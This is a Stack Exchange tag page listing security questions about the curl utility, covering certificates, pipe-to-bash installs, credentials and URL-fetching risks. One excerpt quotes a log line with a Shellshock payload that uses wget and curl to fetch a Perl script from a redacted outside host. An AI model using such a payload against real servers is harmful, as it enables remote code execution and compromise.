IT Security Stack Exchange
IT Security Stack Exchange

Questions tagged [curl]

An open source command line utility for transferring data using URL syntax with support for many protocols including FTP, HTTP, HTTPS, various mail protocols (including IMAP, POP3, and SMTP) and others

cURL is an open source command line utility for transferring data using URL syntax with support for many protocols including FTP, HTTP, HTTPS, various mail protocols (including IMAP, POP3, and SMTP) and others

Related reading

59 questions
71
votes
1 answer

Why is there no certificate error while visiting google.net although it presents a certificate issued to google.com?

The following output shows that google.net is presenting a certificate that has been issued to www.google.com. $ openssl s_client -connect google.net:443 < /dev/null > out.txt 2>&1; cat out.txt depth=2 /C=US/O=GeoTrust Inc./CN=GeoTrust Global…
Lone Learner
  • 968
  • 1
  • 9
  • 18
51
votes
6 answers

Is `curl {something} | sudo bash -` a reasonably safe installation method?

The most straightforward way to install NodeJS on Ubuntu or Debian seems to be Nodesource, whose installation instructions say to run: curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - This clashes with some basic security rules I…
Krubo
  • 789
  • 5
  • 9
49
votes
6 answers

How do I safely inspect a potentially malicious website?

Sometimes I'm interested in what's behind a malicious website. How do I stay on the safe side if I decide to inspect? I'm searching for methods that are quicker and more simple than running the website on a virtual machine. Should I use cURL and…
Mirsad
  • 10,005
  • 8
  • 33
  • 53
36
votes
3 answers

Is it insecure to send a password in a `curl` command?

Here’s an example request we can make to the GitHub API: curl 'https://api.github.com/authorizations' --user "USERNAME" This will prompt for the account password, to continue: Enter host password for user 'USERNAME': If we don’t want to get the…
user137369
  • 693
  • 5
  • 9
18
votes
5 answers

HTTPS connection to specific sites fail with cURL on macOS

On my Mac, HTTPS connnections to certain sites fail using the built-in curl binary of macOS 10.14. They work fine with different browsers, as well as other builds of cURL on the same system. One of the affected sites is https://kapeli.com/, the…
F30
  • 451
  • 1
  • 3
  • 10
14
votes
2 answers

Is allowing unfiltered curl request from a website a vulnerability?

Recently I was on a website which provided some non-sense feature: Enter a URL Press enter HTML source of a given URL is displayed It basically fetched a URL and just dumped the contents of it. It could be XML, txt, HTML, any reachable path via…
Samuel
  • 708
  • 5
  • 13
8
votes
1 answer

Shellshock Exploit evidence - is this a successful attack

I was looking through logs today and noticed the following: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl…
Twenty Five
  • 81
  • 3
7
votes
2 answers

Is it safe to use .netrc files to store credentials for tools like curl or ftp?

The .netrc file can contain username and password credentials for various sites, to allow simpler invocation of tools. For example curl with the -n option will read credentials from the file, for the given target site. Or FTP does similar. Also…
Cheeso
  • 173
  • 1
  • 6
7
votes
1 answer

Make server return "Unable to split netmask from target expression"

I'm interested in making my website a lot more secure and, while playing about scanning other websites, I found that one website responds to nmap traceroute, curl and wget console commands in such a manner that it returns the following…
user115493
6
votes
5 answers

Can a curl request to an arbitrary url made sufficiently safe?

This is a follow up of another topic (Is allowing unfiltered curl request from a website a vulnerability?) on which I am doing some private research. Given: A publicly reachable webservice that accepts any url and performs a curl get request on…
Samuel
  • 708
  • 5
  • 13
5
votes
2 answers

Certificate works in Chrome + Firefox but not with curl ("unable to get local issuer certificate") with the recent cacert.pem

I am trying to connect to a site behind a firewall, that is why I cannot share the URL for verification. $ curl -vvvv https://example.com:8080/foo/ba/?wsdl --cacert /tmp/cacert-2018-12-05.pem * Trying a.b.c.d... * TCP_NODELAY set * Connected to…
Alex
  • 1,207
  • 1
  • 10
  • 9
5
votes
4 answers

Is it possible to execute a local file or code from cURL?

I wonder if it is possible to execute bash code or a local file from cURL, that is, using the following syntax: curl "local file" I was looking for possible solutions and found that to read the local files of the system can be done with "file://"…
Julián
  • 249
  • 1
  • 4
  • 10
5
votes
2 answers

Is there any effective server-side prevention technique against PHP-aided CSRF?

I'm gonna start by saying it: I'm merely a cybersecurity enthusiast, not an expert. Thus, I'm gonna state what I think I know so far, please feel free to correct me at any time. Through my readings, I've come to learn about: The existence of CSRF…
MadWard
  • 233
  • 2
  • 11
4
votes
1 answer

Which SSL/TLS protocol will use by cURL if not defined?

When curl to an HTTPS URL and not not defined the SSL version option, which level of SSL/TLS will be used? From the cURL documentation it says CURL_SSLVERSION_DEFAULT will use as default. CURL_SSLVERSION_DEFAULT The default action. This will…
Gihan
  • 141
  • 1
  • 1
  • 4
4
votes
2 answers

Do browsers and tools send `SNI` field by default connecting to https endpoints?

I am setting up HaProxy for https in passthrough (tcp) mode without SSL/TLS termination. I want to be able to route traffic to different backends based on hostname requested by a client. From HaProxy documentation I learned that there is unencrypted…
Kirill
  • 143
  • 3
1
2 3 4